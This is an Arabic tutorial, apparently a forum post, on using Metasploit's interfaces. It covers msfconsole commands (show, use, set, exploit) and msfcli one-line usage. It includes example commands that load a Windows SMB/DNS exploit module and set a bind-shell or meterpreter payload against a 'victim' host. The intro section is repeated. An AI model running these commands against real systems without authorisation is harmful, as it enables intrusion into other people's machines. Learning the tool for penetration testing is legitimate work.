السلام عليكم ورحمه الله
اليوم درسنا راح يتكلم عن كيفيه التعامل مع واجهات الميتاسبلويت
وهي
1- msfconsole
msfcli -2
msfgui -3
msfw eb -4
msfconsole: هي الواجه المفضله لدي , اولا لانها تتعامل مع سطر الاوامر , ثانيا استخدام اوامر
الليونكس بداخلها , بمعنى اخر بأمكان الفحص والتعامل مع اوامر الليونكس وانت بداخلها .
msfcli : اداه قويه من ناحيه الفكره وسريعه ايضا , بأمكانك استغلال الثغره بدون الدخول الى
msfconsle , استغلال الثغره يتم بسطر واحد , على حسب اعتقادي الاداه هذه
وضعوها ليتم كتابه السكربتات وادواات تستخدم الميتاسبلويت مثل fasttrack
msfgui : الميتاسبلويت بواجه رسوميه ,, لكن لا انصح بها بتاتا اولا الواجهه بطيئه
ثانيا الواجهة ارى ان التعامل معها صعب وايضا ممل
msfwe b : واجهة رسوميه , لكن افضل من سابقتها , لا افضل استعمالها لانها بطيئه ايضا
راح اشرح msfconsole , msfcli لان بمعرفتهم تعرف كيفيه التعامل مع الاخريات .
1- msfconsole
راح اشرح الاوامر المهمه
1- show
الامر هذا يقصد به اعرض سواء payload encoder nops exploits auxiliary , options all
مثال :
show exploits
عرض الثغرات
show payloads
عرض payloads
show encoders
عرض encoders
show nops
عرض nops
show auxiliary
عرض auxiliary
show options
عرض الخيارات
2- use
بمعنى استخدم الثغره او auxiliary
مثال :
اليوم درسنا راح يتكلم عن كيفيه التعامل مع واجهات الميتاسبلويت
وهي
1- msfconsole
msfcli -2
msfgui -3
msfw eb -4
msfconsole: هي الواجه المفضله لدي , اولا لانها تتعامل مع سطر الاوامر , ثانيا استخدام اوامر
الليونكس بداخلها , بمعنى اخر بأمكان الفحص والتعامل مع اوامر الليونكس وانت بداخلها .
msfcli : اداه قويه من ناحيه الفكره وسريعه ايضا , بأمكانك استغلال الثغره بدون الدخول الى
msfconsle , استغلال الثغره يتم بسطر واحد , على حسب اعتقادي الاداه هذه
وضعوها ليتم كتابه السكربتات وادواات تستخدم الميتاسبلويت مثل fasttrack
msfgui : الميتاسبلويت بواجه رسوميه ,, لكن لا انصح بها بتاتا اولا الواجهه بطيئه
ثانيا الواجهة ارى ان التعامل معها صعب وايضا ممل
msfwe b : واجهة رسوميه , لكن افضل من سابقتها , لا افضل استعمالها لانها بطيئه ايضا
راح اشرح msfconsole , msfcli لان بمعرفتهم تعرف كيفيه التعامل مع الاخريات .
1- msfconsole
راح اشرح الاوامر المهمه
1- show
الامر هذا يقصد به اعرض سواء payload encoder nops exploits auxiliary , options all
مثال :
show exploits
عرض الثغرات
show payloads
عرض payloads
show encoders
عرض encoders
show nops
عرض nops
show auxiliary
عرض auxiliary
show options
عرض الخيارات
2- use
بمعنى استخدم الثغره او auxiliary
مثال :
كود PHP:
use exploit/windows/smb/msdns_zone****
كود PHP:
use auxiliary/scanner/smb/version
ما يحتاج كل الي عليك كتابه use ex ومن ثم اضغط زر Tab على الكيبورد وراح يكمل كل شيء
3- info
عرض معلومات الثغره
مثال :
كود PHP:
info exploit/windows/smb/msdns_zone****
كود PHP:
use exploit/windows/smb/msdns_zone****
info
set -4
بمعنى ضع للمتغير قيمه
مثال
set rhost 192.168.1.3
set payload windows/shell_bind_tcp
connect -5
مثل اداه النت كات
exploit and run -6
exploit تستخدم لتشغيل الثغرات
run يستخدم لتشغيل auxiliary
back -7
العوده للوراء
مثال :
كود PHP:
msf exploit(msdns_zone****) > back
msf >
نروح لطريقه استخدام الثغره
استخدامها سهل ما تتعدا خمس اوامر
كود PHP:
اسم الثغره use
show option
ليتم عرض المتغيرات
اسم المتغير set
exploit
show advanced
show evasion
ما انصح بتغيير خياراتهم الا اذا كنت فاهم المطلوب لان من كل ثغره لثغره تختلف , وبعض المرات
الثغره ما تشتغل الا بعد تعديل بعض الخيارات طبعا هذا بناء على جهاز ضحيتك ,
show targets
عرض الاهداف التي تشتغل الثغره عليها
نروح للاداه الاخرى msfcli
نروح لكيفيه الاستخدام
استخدامها سهل جدا وعن طريق سطر واحد
كود PHP:
Usage: ./msfcli <exploit_****> <option=value> [mode]
====================================================
Mode Description
---- -----------
(H)elp You're looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
O = خيارات الثغره
ِE = تشغيل الثغره
P = عرض بايلود الخاصه
مثال لاستغلال ثغره
كود PHP:
./msfcli exploit/windows/*** payload=windows/meterpreter/** rhost=A.B.C.D lhost=1.1.1.1
كود PHP:
set rhost a.b.c.d
set payload windows/****
rhost=
payload
حياكم الله
{[['
']]}
']]}